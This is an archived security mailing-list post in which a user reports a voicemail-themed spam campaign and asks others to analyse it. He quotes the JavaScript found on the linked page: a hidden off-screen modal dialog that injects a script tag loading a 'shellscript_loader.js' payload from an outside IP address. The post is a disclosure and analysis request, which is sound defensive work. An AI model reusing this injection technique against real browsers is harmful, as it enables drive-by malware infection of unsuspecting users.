lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <EKECJMGPAACGOMIGLJJDOEJKEGAA.geoincidents@nls.net>
From: geoincidents at nls.net (Geo.)
Subject: spamming trojan?

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ